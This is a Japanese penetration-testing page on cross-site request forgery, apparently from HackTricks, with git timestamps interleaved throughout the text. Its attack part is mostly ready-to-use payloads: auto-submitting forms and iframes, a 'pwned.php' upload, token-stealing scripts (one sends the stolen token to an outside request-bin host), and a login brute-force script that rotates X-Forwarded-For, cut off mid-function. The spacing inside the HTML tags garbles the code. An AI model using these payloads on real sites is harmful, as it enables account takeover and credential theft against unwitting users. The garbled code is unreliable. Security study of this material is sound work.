2024-07-19 16:28:25 +00:00
# CSRF (クロスサイトリクエストフォージェリ)
2022-04-28 16:01:33 +00:00
2024-07-19 16:28:25 +00:00
{% hint style="success" %}
AWSハッキングを学び、実践する: < img src = "/.gitbook/assets/arte.png" alt = "" data-size = "line" > [**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)< img src = "/.gitbook/assets/arte.png" alt = "" data-size = "line" > \
GCPハッキングを学び、実践する: < img src = "/.gitbook/assets/grte.png" alt = "" data-size = "line" > [**HackTricks Training GCP Red Team Expert (GRTE)**< img src = "/.gitbook/assets/grte.png" alt = "" data-size = "line" > ](https://training.hacktricks.xyz/courses/grte)
2022-04-28 16:01:33 +00:00
2024-07-19 16:28:25 +00:00
< details >
2022-04-28 16:01:33 +00:00
2024-07-19 16:28:25 +00:00
< summary > HackTricksをサポートする< / summary >
2022-04-28 16:01:33 +00:00
2024-07-19 16:28:25 +00:00
* [**サブスクリプションプラン** ](https://github.com/sponsors/carlospolop )を確認してください!
* **💬 [**Discordグループ** ](https://discord.gg/hRep4RUj7f )または[**Telegramグループ**](https://t.me/peass)に参加するか、**Twitter**で**フォロー**してください 🐦 [**@hacktricks\_live** ](https://twitter.com/hacktricks\_live )**.**
* **ハッキングトリックを共有するには、[**HackTricks**](https://github.com/carlospolop/hacktricks)および[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のGitHubリポジトリにPRを送信してください。**
2022-04-28 16:01:33 +00:00
2023-12-31 05:23:56 +00:00
< / details >
2024-07-19 16:28:25 +00:00
{% endhint %}
2022-10-27 23:22:18 +00:00
2024-05-05 23:08:22 +00:00
< figure > < img src = "../.gitbook/assets/image (380).png" alt = "" > < figcaption > < / figcaption > < / figure >
2023-02-27 09:28:45 +00:00
2024-07-19 16:28:25 +00:00
[**HackenProof Discord** ](https://discord.com/invite/N3FrSbmwdy )サーバーに参加して、経験豊富なハッカーやバグバウンティハンターとコミュニケーションを取りましょう!
2023-02-27 09:28:45 +00:00
2023-12-31 05:23:56 +00:00
**ハッキングの洞察**\
2024-07-19 16:28:25 +00:00
ハッキングのスリルと課題に深く掘り下げたコンテンツに参加しましょう
2023-02-27 09:28:45 +00:00
2024-05-05 23:08:22 +00:00
**リアルタイムハックニュース**\
2024-07-19 16:28:25 +00:00
リアルタイムのニュースと洞察を通じて、急速に変化するハッキングの世界に遅れずについていきましょう
2023-07-14 16:20:47 +00:00
2024-07-19 16:28:25 +00:00
**最新の発表**\
新しいバグバウンティの開始や重要なプラットフォームの更新について情報を得ましょう
2020-07-15 15:43:14 +00:00
2024-07-19 16:28:25 +00:00
**[**Discord**](https://discord.com/invite/N3FrSbmwdy)に参加して、今日からトップハッカーとコラボレーションを始めましょう!**
2020-07-15 15:43:14 +00:00
2024-07-19 16:28:25 +00:00
## クロスサイトリクエストフォージェリ (CSRF) の説明
2020-07-15 15:43:14 +00:00
2024-07-19 16:28:25 +00:00
**クロスサイトリクエストフォージェリ (CSRF)** は、ウェブアプリケーションに見られるセキュリティ脆弱性の一種です。これにより、攻撃者は認証されたセッションを悪用して、無防備なユーザーの代わりにアクションを実行できます。攻撃は、被害者のプラットフォームにログインしているユーザーが悪意のあるサイトを訪れたときに実行されます。このサイトは、JavaScriptの実行、フォームの送信、または画像の取得などの方法で、被害者のアカウントへのリクエストをトリガーします。
2020-07-15 15:43:14 +00:00
2024-02-05 20:22:21 +00:00
### CSRF攻撃の前提条件
2024-02-23 16:45:40 +00:00
2024-02-05 20:22:21 +00:00
CSRF脆弱性を悪用するには、いくつかの条件を満たす必要があります:
2020-07-15 15:43:14 +00:00
2024-07-19 16:28:25 +00:00
1. **価値のあるアクションを特定する** :攻撃者は、ユーザーのパスワード、メールアドレスの変更、または権限の昇格など、悪用する価値のあるアクションを見つける必要があります。
2. **セッション管理** : ユーザーのセッションは、クッキーまたはHTTP基本認証ヘッダーのみで管理されるべきです。他のヘッダーはこの目的のために操作できません。
3. **予測不可能なパラメータの不在** :リクエストには予測不可能なパラメータが含まれていない必要があります。これらは攻撃を防ぐ可能性があります。
2024-02-23 16:45:40 +00:00
### クイックチェック
2024-07-19 16:28:25 +00:00
**Burpでリクエストをキャプチャ**し、CSRF保護を確認することができます。また、ブラウザからテストするには、**Copy as fetch**をクリックしてリクエストを確認できます:
2024-02-23 16:45:40 +00:00
2024-05-08 16:39:49 +00:00
< figure > < img src = "../.gitbook/assets/image (11) (1).png" alt = "" > < figcaption > < / figcaption > < / figure >
2020-07-15 15:43:14 +00:00
2024-07-19 16:28:25 +00:00
### CSRFからの防御
2020-07-15 15:43:14 +00:00
2024-07-19 16:28:25 +00:00
CSRF攻撃から保護するために実装できるいくつかの対策があります:
2024-02-23 16:45:40 +00:00
2024-07-19 16:28:25 +00:00
* [**SameSiteクッキー** ](hacking-with-cookies/#samesite ):この属性は、ブラウザがクロスサイトリクエストと共にクッキーを送信するのを防ぎます。[SameSiteクッキーの詳細](hacking-with-cookies/#samesite)。
* [**クロスオリジンリソースシェアリング** ](cors-bypass.md ): 被害者サイトのCORSポリシーは、攻撃の実行可能性に影響を与える可能性があります。特に、攻撃が被害者サイトからの応答を読み取る必要がある場合。[CORSバイパスについて学ぶ](cors-bypass.md)。
* **ユーザー確認**:ユーザーのパスワードを求めたり、キャプチャを解決させたりすることで、ユーザーの意図を確認できます。
* **リファラーまたはオリジンヘッダーの確認**: これらのヘッダーを検証することで、リクエストが信頼できるソースから来ていることを確認できます。ただし、URLを慎重に作成することで、実装が不十分なチェックを回避できる場合があります。例えば:
* `http://mal.net?orig=http://example.com` を使用する( URLが信頼できるURLで終わる)
* `http://example.com.mal.net` を使用する( URLが信頼できるURLで始まる)
* **パラメータ名の変更**: POSTまたはGETリクエストのパラメータ名を変更することで、自動化された攻撃を防ぐのに役立ちます。
* **CSRFトークン**: 各セッションにユニークなCSRFトークンを組み込み、以降のリクエストでこのトークンを要求することで、CSRFのリスクを大幅に軽減できます。トークンの効果は、CORSを強制することで向上させることができます。
2020-07-15 15:43:14 +00:00
2024-07-19 16:28:25 +00:00
これらの防御を理解し、実装することは、ウェブアプリケーションのセキュリティと整合性を維持するために重要です。
2020-07-15 15:43:14 +00:00
2023-12-31 05:23:56 +00:00
## 防御のバイパス
2020-07-15 15:43:14 +00:00
2023-07-07 23:42:27 +00:00
### POSTからGETへ
2020-07-15 15:43:14 +00:00
2024-07-19 16:28:25 +00:00
悪用したいフォームが**CSRFトークンを持つPOSTリクエストを送信するように準備されている**かもしれませんが、**GET**も**有効**であり、GETリクエストを送信したときに**CSRFトークンがまだ検証されているか**を**確認**する必要があります。
2020-07-15 15:43:14 +00:00
2023-07-07 23:42:27 +00:00
### トークンの欠如
2020-07-15 15:43:14 +00:00
2024-07-19 16:28:25 +00:00
アプリケーションは、トークンが存在する場合に**トークンを検証するメカニズム**を実装しているかもしれません。しかし、トークンが存在しない場合に検証が完全にスキップされると、脆弱性が生じます。攻撃者は、トークンを運ぶパラメータを**削除すること**によってこれを悪用できます。これにより、検証プロセスを回避し、クロスサイトリクエストフォージェリ (CSRF) 攻撃を効果的に実行できます。
2024-02-05 20:22:21 +00:00
2024-07-19 16:28:25 +00:00
### CSRFトークンがユーザーセッションに結びついていない
2024-02-05 20:22:21 +00:00
2024-07-19 16:28:25 +00:00
アプリケーションが**CSRFトークンをユーザーセッションに結びつけていない**場合、重大な**セキュリティリスク**が存在します。これらのシステムは、各トークンが開始セッションにバインドされていることを確認するのではなく、**グローバルプール**に対してトークンを検証します。
2024-02-05 20:22:21 +00:00
2024-07-19 16:28:25 +00:00
攻撃者がこれを悪用する方法は次のとおりです:
2023-12-31 05:23:56 +00:00
2024-07-19 16:28:25 +00:00
1. **自分のアカウントを使用して認証**します。
2. **グローバルプールから有効なCSRFトークンを取得**します。
3. **このトークンを使用して** 、被害者に対するCSRF攻撃を行います。
2023-12-31 05:23:56 +00:00
2024-07-19 16:28:25 +00:00
この脆弱性により、攻撃者は被害者の代わりに無許可のリクエストを行うことができ、アプリケーションの**不十分なトークン検証メカニズム**を悪用します。
2023-12-31 05:23:56 +00:00
2024-07-19 16:28:25 +00:00
### メソッドバイパス
2020-07-15 15:43:14 +00:00
2024-07-19 16:28:25 +00:00
リクエストが「**奇妙な**」**メソッド**を使用している場合、**メソッド**の**オーバーライド機能**が機能しているか確認してください。例えば、**PUT**メソッドを使用している場合、**POST**メソッドを使用して**送信**することを試みることができます: _https://example.com/my/dear/api/val/num?**\_method=PUT**_
2023-12-31 05:23:56 +00:00
2024-07-19 16:28:25 +00:00
これは、**POSTリクエスト内に\_methodパラメータを送信する**か、**ヘッダー**を使用することでも機能します:
2023-12-31 05:23:56 +00:00
2024-07-19 16:28:25 +00:00
* _X-HTTP-Method_
* _X-HTTP-Method-Override_
* _X-Method-Override_
2020-07-15 15:43:14 +00:00
2024-05-08 16:39:49 +00:00
### カスタムヘッダートークンのバイパス
2020-07-15 15:43:14 +00:00
2024-07-19 16:28:25 +00:00
リクエストが**CSRF保護メソッド**として**トークン**を持つ**カスタムヘッダー**を追加している場合:
2020-07-15 15:43:14 +00:00
2024-07-19 16:28:25 +00:00
* **カスタマイズされたトークンとヘッダーなしでリクエストをテスト**します。
* **同じ長さだが異なるトークンでリクエストをテスト**します。
2020-07-15 15:43:14 +00:00
2024-07-19 16:28:25 +00:00
### CSRFトークンがクッキーによって検証される
2020-07-15 15:43:14 +00:00
2024-07-19 16:28:25 +00:00
アプリケーションは、トークンをクッキーとリクエストパラメータの両方に複製することによってCSRF保護を実装するか、CSRFクッキーを設定し、バックエンドで送信されたトークンがクッキーに対応しているかを検証することがあります。アプリケーションは、リクエストパラメータ内のトークンがクッキーの値と一致するかどうかを確認することでリクエストを検証します。
2020-07-15 15:43:14 +00:00
2024-07-19 16:28:25 +00:00
ただし、この方法は、攻撃者が被害者のブラウザにCSRFクッキーを設定できる脆弱性がある場合、CSRF攻撃に対して脆弱です。攻撃者は、クッキーを設定する欺瞞的な画像を読み込んだ後、CSRF攻撃を開始することでこれを悪用できます。
2021-11-30 16:46:07 +00:00
2024-07-19 16:28:25 +00:00
以下は、攻撃がどのように構成されるかの例です:
2021-11-30 16:46:07 +00:00
```html
< html >
2024-02-05 20:22:21 +00:00
<!-- CSRF Proof of Concept - generated by Burp Suite Professional -->
2023-07-07 23:42:27 +00:00
< body >
< script > history . pushState ( '' , '' , '/' ) < / script >
2024-02-05 20:22:21 +00:00
< form action = "https://example.com/my-account/change-email" method = "POST" >
2023-07-07 23:42:27 +00:00
< input type = "hidden" name = "email" value = "asd@asd.asd" / >
< input type = "hidden" name = "csrf" value = "tZqZzQ1tiPj8KFnO4FOAawq7UsYzDk8E" / >
< input type = "submit" value = "Submit request" / >
< / form >
2024-02-05 20:22:21 +00:00
< img src = "https://example.com/?search=term%0d%0aSet-Cookie:%20csrf=tZqZzQ1tiPj8KFnO4FOAawq7UsYzDk8E" onerror = "document.forms[0].submit();" / >
2023-07-07 23:42:27 +00:00
< / body >
2021-11-30 16:46:07 +00:00
< / html >
2024-02-05 20:22:21 +00:00
2021-11-30 16:46:07 +00:00
```
{% hint style="info" %}
2024-07-19 16:28:25 +00:00
注意してください、**csrfトークンがセッションクッキーに関連している場合、この攻撃は機能しません**。なぜなら、あなたは被害者のセッションを設定する必要があり、そのため自分自身を攻撃することになります。
2021-11-30 16:46:07 +00:00
{% endhint %}
2020-07-15 15:43:14 +00:00
2024-07-19 16:28:25 +00:00
### Content-Typeの変更
2020-08-10 09:56:57 +00:00
2024-07-19 16:28:25 +00:00
[**こちら** ](https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS#simple\_requests )によると、**プレフライト**リクエストを避けるために**POST**メソッドを使用する場合、許可されているContent-Typeの値は次の通りです:
2021-05-29 20:00:49 +00:00
2024-07-19 16:28:25 +00:00
* **`application/x-www-form-urlencoded`**
* **`multipart/form-data`**
* **`text/plain`**
2021-05-29 20:00:49 +00:00
2024-07-19 16:28:25 +00:00
ただし、使用される**Content-Type**によって**サーバーのロジックが異なる場合がある**ため、上記の値や**`application/json`**_**,**_**`text/xml`**, ** `application/xml` **_._などの他の値も試すべきです。
2022-04-22 08:32:18 +00:00
2024-07-19 16:28:25 +00:00
例([こちら](https://brycec.me/posts/corctf\_2021\_challenges)から) として、JSONデータをtext/plainとして送信する方法:
2022-04-22 08:32:18 +00:00
```html
< html >
2023-07-07 23:42:27 +00:00
< body >
< form id = "form" method = "post" action = "https://phpme.be.ax/" enctype = "text/plain" >
< input name = '{"garbageeeee":"' value = '", "yep": "yep yep yep", "url": "https://webhook/"}' >
< / form >
< script >
form.submit();
< / script >
< / body >
2022-04-22 08:32:18 +00:00
< / html >
```
2024-07-19 16:28:25 +00:00
### JSONデータのためのプリフライトリクエストのバイパス
2021-10-05 10:00:17 +00:00
2024-07-19 16:28:25 +00:00
POSTリクエストを介してJSONデータを送信しようとする際、HTMLフォームで`Content-Type: application/json`を使用することは直接的には不可能です。同様に、`XMLHttpRequest`を使用してこのコンテンツタイプを送信すると、プリフライトリクエストが開始されます。それでも、この制限を回避し、サーバーがContent-Typeに関係なくJSONデータを処理するかどうかを確認するための戦略があります:
2022-02-21 15:48:28 +00:00
2024-07-19 16:28:25 +00:00
1. **代替コンテンツタイプの使用** : フォームで`enctype="text/plain"`を設定することにより、`Content-Type: text/plain`または`Content-Type: application/x-www-form-urlencoded`を使用します。このアプローチは、バックエンドがContent-Typeに関係なくデータを利用するかどうかをテストします。
2. **コンテンツタイプの変更** : サーバーがコンテンツをJSONとして認識することを保証しつつプリフライトリクエストを回避するために、`Content-Type: text/plain; application/json`でデータを送信できます。これはプリフライトリクエストをトリガーしませんが、サーバーが`application/json`を受け入れるように設定されていれば正しく処理される可能性があります。
3. **SWFフラッシュファイルの利用** : あまり一般的ではありませんが、SWFフラッシュファイルを使用してこのような制限を回避する方法もあります。この技術の詳細については、[この投稿](https://anonymousyogi.medium.com/json-csrf-csrf-that-none-talks-about-c2bf9a480937)を参照してください。
2021-10-05 10:00:17 +00:00
2024-07-19 16:28:25 +00:00
### リファラー / オリジンチェックのバイパス
2020-07-15 15:43:14 +00:00
2024-07-19 16:28:25 +00:00
**リファラーヘッダーを避ける**
2020-07-15 15:43:14 +00:00
2024-07-19 16:28:25 +00:00
アプリケーションは、'Referer'ヘッダーが存在する場合のみ検証することがあります。このヘッダーをブラウザが送信しないようにするために、次のHTMLメタタグを使用できます:
2024-02-05 20:22:21 +00:00
```xml
2020-07-15 15:43:14 +00:00
< meta name = "referrer" content = "never" >
```
2024-07-19 16:28:25 +00:00
これにより、'Referer' ヘッダーが省略され、一部のアプリケーションでの検証チェックを回避する可能性があります。
2024-04-06 18:36:04 +00:00
2024-07-19 16:28:25 +00:00
**Regexp バイパス**
2020-07-15 15:43:14 +00:00
2022-02-13 12:30:13 +00:00
{% content-ref url="ssrf-server-side-request-forgery/url-format-bypass.md" %}
[url-format-bypass.md ](ssrf-server-side-request-forgery/url-format-bypass.md )
{% endcontent-ref %}
2020-07-15 15:43:14 +00:00
2024-07-19 16:28:25 +00:00
Referrer がパラメータ内で送信する URL のサーバーのドメイン名を設定するには、次のようにします:
2021-11-30 16:46:07 +00:00
```html
< html >
2023-07-07 23:42:27 +00:00
<!-- Referrer policy needed to send the qury parameter in the referrer -->
< head > < meta name = "referrer" content = "unsafe-url" > < / head >
< body >
< script > history . pushState ( '' , '' , '/' ) < / script >
< form action = "https://ac651f671e92bddac04a2b2e008f0069.web-security-academy.net/my-account/change-email" method = "POST" >
< input type = "hidden" name = "email" value = "asd@asd.asd" / >
< input type = "submit" value = "Submit request" / >
< / form >
< script >
// You need to set this or the domain won't appear in the query of the referer header
history.pushState("", "", "?ac651f671e92bddac04a2b2e008f0069.web-security-academy.net")
document.forms[0].submit();
< / script >
< / body >
2021-11-30 16:46:07 +00:00
< / html >
```
2024-02-05 20:22:21 +00:00
### **HEADメソッドバイパス**
2023-07-14 16:20:47 +00:00
2024-07-19 16:28:25 +00:00
[**このCTFの解説** ](https://github.com/google/google-ctf/tree/master/2023/web-vegsoda/solution )の最初の部分では、[Oakのソースコード](https://github.com/oakserver/oak/blob/main/router.ts#L281)が説明されており、ルーターは**HEADリクエストをGETリクエストとして処理する**ように設定されています - これはOakに特有の一般的な回避策です。HEADリクエストを処理する特定のハンドラーの代わりに、単に**GETハンドラーに渡されますが、アプリはレスポンスボディを削除します**。
2023-07-14 16:20:47 +00:00
2024-07-19 16:28:25 +00:00
したがって、GETリクエストが制限されている場合は、**GETリクエストとして処理されるHEADリクエストを送信することができます**。
2022-10-27 23:22:18 +00:00
2024-07-19 16:28:25 +00:00
## **エクスプロイトの例**
2020-07-15 15:43:14 +00:00
2024-07-19 16:28:25 +00:00
### **CSRFトークンの抽出**
2020-07-15 15:43:14 +00:00
2024-07-19 16:28:25 +00:00
**CSRFトークン**が**防御**として使用されている場合、[**XSS**](xss-cross-site-scripting/#xss-stealing-csrf-tokens)脆弱性や[**ダングリングマークアップ**](dangling-markup-html-scriptless-injection/)脆弱性を悪用して**抽出を試みる**ことができます。
2020-07-15 15:43:14 +00:00
2023-12-31 05:23:56 +00:00
### **HTMLタグを使用したGET**
2024-02-05 20:22:21 +00:00
```xml
2021-10-05 10:00:17 +00:00
< img src = "http://google.es?param=VALUE" style = "display:none" / >
2020-07-15 15:43:14 +00:00
< h1 > 404 - Page not found< / h1 >
The URL you are requesting is no longer available
```
2024-07-19 16:28:25 +00:00
他のHTML5タグで自動的にGETリクエストを送信できるものは次のとおりです:
2024-02-05 20:22:21 +00:00
```html
< iframe src = "..." > < / iframe >
< script src = "..." > < / script >
< img src = "..." alt = "" >
< embed src = "..." >
< audio src = "..." >
< video src = "..." >
< source src = "..." type = "..." >
< video poster = "..." >
< link rel = "stylesheet" href = "..." >
< object data = "..." >
< body background = "..." >
< div style = "background: url('...');" > < / div >
< style >
body { background: url('...'); }
< / style >
< bgsound src = "..." >
< track src = "..." kind = "subtitles" >
< input type = "image" src = "..." alt = "Submit Button" >
```
### フォームGETリクエスト
```html
2020-07-15 15:43:14 +00:00
< html >
2023-07-07 23:42:27 +00:00
<!-- CSRF PoC - generated by Burp Suite Professional -->
< body >
< script > history . pushState ( '' , '' , '/' ) < / script >
< form method = "GET" action = "https://victim.net/email/change-email" >
< input type = "hidden" name = "email" value = "some@email.com" / >
< input type = "submit" value = "Submit request" / >
< / form >
< script >
document.forms[0].submit();
< / script >
< / body >
2020-07-15 15:43:14 +00:00
< / html >
```
2023-12-31 05:23:56 +00:00
### フォームPOSTリクエスト
2024-02-05 20:22:21 +00:00
```html
2020-07-15 15:43:14 +00:00
< html >
2023-07-07 23:42:27 +00:00
< body >
< script > history . pushState ( '' , '' , '/' ) < / script >
< form method = "POST" action = "https://victim.net/email/change-email" id = "csrfform" >
< input type = "hidden" name = "email" value = "some@email.com" autofocus onfocus = "csrfform.submit();" / > <!-- Way 1 to autosubmit -->
< input type = "submit" value = "Submit request" / >
< img src = x onerror = "csrfform.submit();" / > <!-- Way 2 to autosubmit -->
< / form >
< script >
document.forms[0].submit(); //Way 3 to autosubmit
< / script >
< / body >
2020-07-15 15:43:14 +00:00
< / html >
2021-06-04 23:20:57 +00:00
```
2024-02-05 20:22:21 +00:00
### iframeを通じたフォームPOSTリクエスト
```html
2023-07-07 23:42:27 +00:00
<!--
The request is sent through the iframe withuot reloading the page
2021-06-04 23:20:57 +00:00
-->
< html >
2023-07-07 23:42:27 +00:00
< body >
< iframe style = "display:none" name = "csrfframe" > < / iframe >
< form method = "POST" action = "/change-email" id = "csrfform" target = "csrfframe" >
< input type = "hidden" name = "email" value = "some@email.com" autofocus onfocus = "csrfform.submit();" / >
< input type = "submit" value = "Submit request" / >
< / form >
< script >
document.forms[0].submit();
< / script >
< / body >
2021-06-04 23:20:57 +00:00
< / html >
2020-07-15 15:43:14 +00:00
```
2024-02-05 20:22:21 +00:00
### **Ajax POST リクエスト**
```html
2020-07-15 15:43:14 +00:00
< script >
var xh;
if (window.XMLHttpRequest)
2023-07-07 23:42:27 +00:00
{// code for IE7+, Firefox, Chrome, Opera, Safari
xh=new XMLHttpRequest();
}
2020-07-15 15:43:14 +00:00
else
2023-07-07 23:42:27 +00:00
{// code for IE6, IE5
xh=new ActiveXObject("Microsoft.XMLHTTP");
}
2021-06-05 01:10:15 +00:00
xh.withCredentials = true;
2020-07-15 15:43:14 +00:00
xh.open("POST","http://challenge01.root-me.org/web-client/ch22/?action=profile");
xh.setRequestHeader('Content-type', 'application/x-www-form-urlencoded'); //to send proper header info (optional, but good to have as it may sometimes not work without this)
xh.send("username=abcd&status=on");
< / script >
2021-06-05 01:10:15 +00:00
< script >
//JQuery version
$.ajax({
2023-07-07 23:42:27 +00:00
type: "POST",
url: "https://google.com",
data: "param=value& param2=value2"
2021-06-05 01:10:15 +00:00
})
< / script >
2020-07-15 15:43:14 +00:00
```
2024-02-05 20:22:21 +00:00
### multipart/form-data POST リクエスト
2020-07-15 15:43:14 +00:00
```javascript
myFormData = new FormData();
var blob = new Blob(["<?php phpinfo(); ?> "], { type: "text/text"});
myFormData.append("newAttachment", blob, "pwned.php");
fetch("http://example/some/path", {
2023-07-07 23:42:27 +00:00
method: "post",
body: myFormData,
credentials: "include",
headers: {"Content-Type": "application/x-www-form-urlencoded"},
mode: "no-cors"
2020-07-15 15:43:14 +00:00
});
```
2024-02-05 20:22:21 +00:00
### multipart/form-data POST リクエスト v2
2020-07-15 15:43:14 +00:00
```javascript
2024-02-05 20:22:21 +00:00
// https://www.exploit-db.com/exploits/20009
2020-07-15 15:43:14 +00:00
var fileSize = fileData.length,
boundary = "OWNEDBYOFFSEC",
xhr = new XMLHttpRequest();
2021-06-05 01:10:15 +00:00
xhr.withCredentials = true;
2020-07-15 15:43:14 +00:00
xhr.open("POST", url, true);
// MIME POST request.
xhr.setRequestHeader("Content-Type", "multipart/form-data, boundary="+boundary);
xhr.setRequestHeader("Content-Length", fileSize);
var body = "--" + boundary + "\r\n";
body += 'Content-Disposition: form-data; name="' + nameVar +'"; filename="' + fileName + '"\r\n';
body += "Content-Type: " + ctype + "\r\n\r\n";
body += fileData + "\r\n";
body += "--" + boundary + "--";
//xhr.send(body);
xhr.sendAsBinary(body);
```
2024-02-05 20:22:21 +00:00
### iframe内からのフォームPOSTリクエスト
```html
2020-07-15 15:43:14 +00:00
< -- ! expl . html -- >
< body onload = "envia()" >
< form method = "POST" id = "formulario" action = "http://aplicacion.example.com/cambia_pwd.php" >
< input type = "text" id = "pwd" name = "pwd" value = "otra nueva" >
< / form >
< body >
< script >
function envia(){document.getElementById("formulario").submit();}
< / script >
<!-- public.html -->
< iframe src = "2-1.html" style = "position:absolute;top:-5000" >
< / iframe >
< h1 > Sitio bajo mantenimiento. Disculpe las molestias< / h1 >
```
2024-07-19 16:28:25 +00:00
### **CSRFトークンを盗み、POSTリクエストを送信する**
2020-07-15 15:43:14 +00:00
```javascript
function submitFormWithTokenJS(token) {
2023-07-07 23:42:27 +00:00
var xhr = new XMLHttpRequest();
xhr.open("POST", POST_URL, true);
xhr.withCredentials = true;
// Send the proper header information along with the request
xhr.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
2020-07-15 15:43:14 +00:00
2023-07-07 23:42:27 +00:00
// This is for debugging and can be removed
xhr.onreadystatechange = function() {
if(xhr.readyState === XMLHttpRequest.DONE & & xhr.status === 200) {
//console.log(xhr.responseText);
}
}
xhr.send("token=" + token + "&otherparama=heyyyy");
2020-07-15 15:43:14 +00:00
}
function getTokenJS() {
2023-07-07 23:42:27 +00:00
var xhr = new XMLHttpRequest();
// This tels it to return it as a HTML document
xhr.responseType = "document";
xhr.withCredentials = true;
// true on the end of here makes the call asynchronous
xhr.open("GET", GET_URL, true);
xhr.onload = function (e) {
if (xhr.readyState === XMLHttpRequest.DONE & & xhr.status === 200) {
// Get the document from the response
page = xhr.response
// Get the input element
input = page.getElementById("token");
// Show the token
//console.log("The token is: " + input.value);
// Use the token to submit the form
submitFormWithTokenJS(input.value);
}
};
// Make the request
xhr.send(null);
2020-07-15 15:43:14 +00:00
}
var GET_URL="http://google.com?param=VALUE"
var POST_URL="http://google.com?param=VALUE"
getTokenJS();
```
2024-07-19 16:28:25 +00:00
### **CSRFトークンを盗み、iframe、フォーム、Ajaxを使用してPostリクエストを送信する**
2024-02-05 20:22:21 +00:00
```html
2020-07-15 15:43:14 +00:00
< form id = "form1" action = "http://google.com?param=VALUE" method = "post" enctype = "multipart/form-data" >
< input type = "text" name = "username" value = "AA" >
< input type = "checkbox" name = "status" checked = "checked" >
< input id = "token" type = "hidden" name = "token" value = "" / >
< / form >
< script type = "text/javascript" >
function f1(){
2023-07-07 23:42:27 +00:00
x1=document.getElementById("i1");
x1d=(x1.contentWindow||x1.contentDocument);
t=x1d.document.getElementById("token").value;
document.getElementById("token").value=t;
document.getElementById("form1").submit();
2020-07-15 15:43:14 +00:00
}
2023-07-07 23:42:27 +00:00
< / script >
2020-07-15 15:43:14 +00:00
< iframe id = "i1" style = "display:none" src = "http://google.com?param=VALUE" onload = "javascript:f1();" > < / iframe >
```
2024-02-23 16:45:40 +00:00
### **CSRFトークンを盗み、iframeとフォームを使用してPOSTリクエストを送信する**
2024-02-05 20:22:21 +00:00
```html
2020-07-15 15:43:14 +00:00
< iframe id = "iframe" src = "http://google.com?param=VALUE" width = "500" height = "500" onload = "read()" > < / iframe >
2023-07-07 23:42:27 +00:00
< script >
2020-07-15 15:43:14 +00:00
function read()
{
2023-07-07 23:42:27 +00:00
var name = 'admin2';
var token = document.getElementById("iframe").contentDocument.forms[0].token.value;
document.writeln('< form width = "0" height = "0" method = "post" action = "http://www.yoursebsite.com/check.php" enctype = "multipart/form-data" > ');
document.writeln('< input id = "username" type = "text" name = "username" value = "' + name + '" / > < br / > ');
document.writeln('< input id = "token" type = "hidden" name = "token" value = "' + token + '" / > ');
document.writeln('< input type = "submit" name = "submit" value = "Submit" / > < br / > ');
document.writeln('< / form > ');
document.forms[0].submit.click();
2020-07-15 15:43:14 +00:00
}
< / script >
```
2024-02-05 20:22:21 +00:00
### **トークンを盗み、2つのiframeを使用して送信する**
```html
2020-07-15 15:43:14 +00:00
< script >
var token;
function readframe1(){
2023-07-07 23:42:27 +00:00
token = frame1.document.getElementById("profile").token.value;
document.getElementById("bypass").token.value = token
loadframe2();
2020-07-15 15:43:14 +00:00
}
function loadframe2(){
2023-07-07 23:42:27 +00:00
var test = document.getElementbyId("frame2");
test.src = "http://requestb.in/1g6asbg1?token="+token;
2020-07-15 15:43:14 +00:00
}
< / script >
2023-07-07 23:42:27 +00:00
< iframe id = "frame1" name = "frame1" src = "http://google.com?param=VALUE" onload = "readframe1()"
2020-07-15 15:43:14 +00:00
sandbox="allow-same-origin allow-scripts allow-forms allow-popups allow-top-navigation"
height="600" width="800">< / iframe >
2023-07-07 23:42:27 +00:00
< iframe id = "frame2" name = "frame2"
2020-07-15 15:43:14 +00:00
sandbox="allow-same-origin allow-scripts allow-forms allow-popups allow-top-navigation"
height="600" width="800">< / iframe >
< body onload = "document.forms[0].submit()" >
< form id = "bypass" name " bypass " method = "POST" target = "frame2" action = "http://google.com?param=VALUE" enctype = "multipart/form-data" >
2023-07-07 23:42:27 +00:00
< input type = "text" name = "username" value = "z" >
< input type = "checkbox" name = "status" checked = "" >
< input id = "token" type = "hidden" name = "token" value = "0000" / >
< button type = "submit" > Submit< / button >
2020-07-15 15:43:14 +00:00
< / form >
```
2024-07-19 16:28:25 +00:00
### **POSTAjaxを使用してCSRFトークンを盗み、フォームでPOSTを送信する**
2024-02-05 20:22:21 +00:00
```html
2020-07-15 15:43:14 +00:00
< body onload = "getData()" >
< form id = "form" action = "http://google.com?param=VALUE" method = "POST" enctype = "multipart/form-data" >
2023-07-07 23:42:27 +00:00
< input type = "hidden" name = "username" value = "root" / >
< input type = "hidden" name = "status" value = "on" / >
< input type = "hidden" id = "findtoken" name = "token" value = "" / >
< input type = "submit" value = "valider" / >
2020-07-15 15:43:14 +00:00
< / form >
< script >
var x = new XMLHttpRequest();
function getData() {
2023-07-07 23:42:27 +00:00
x.withCredentials = true;
x.open("GET","http://google.com?param=VALUE",true);
x.send(null);
2020-07-15 15:43:14 +00:00
}
x.onreadystatechange = function() {
2023-07-07 23:42:27 +00:00
if (x.readyState == XMLHttpRequest.DONE) {
var token = x.responseText.match(/name="token" value="(.+)"/)[1];
document.getElementById("findtoken").value = token;
document.getElementById("form").submit();
}
2020-07-15 15:43:14 +00:00
}
< / script >
```
2024-07-19 16:28:25 +00:00
### CSRF with Socket.IO
2024-02-05 20:22:21 +00:00
```html
2020-08-06 20:38:54 +00:00
< script src = "https://cdn.jsdelivr.net/npm/socket.io-client@2/dist/socket.io.js" > < / script >
< script >
let socket = io('http://six.jh2i.com:50022/test');
const username = 'admin'
socket.on('connect', () => {
2023-07-07 23:42:27 +00:00
console.log('connected!');
socket.emit('join', {
room: username
});
socket.emit('my_room_event', {
data: '!flag',
room: username
})
2020-08-06 20:38:54 +00:00
});
< / script >
```
2024-02-05 20:22:21 +00:00
## CSRFログインブルートフォース
2020-08-06 20:38:54 +00:00
2024-07-19 16:28:25 +00:00
このコードは、CSRFトークンを使用してログインフォームをブルートフォースするために使用できます( 可能なIPブラックリストを回避するために、ヘッダーX-Forwarded-Forも使用しています) :
2020-11-06 18:22:38 +00:00
```python
import request
import re
import random
URL = "http://10.10.10.191/admin/"
PROXY = { "http": "127.0.0.1:8080"}
SESSION_COOKIE_NAME = "BLUDIT-KEY"
USER = "fergus"
PASS_LIST="./words"
def init_session():
2023-07-07 23:42:27 +00:00
#Return CSRF + Session (cookie)
r = requests.get(URL)
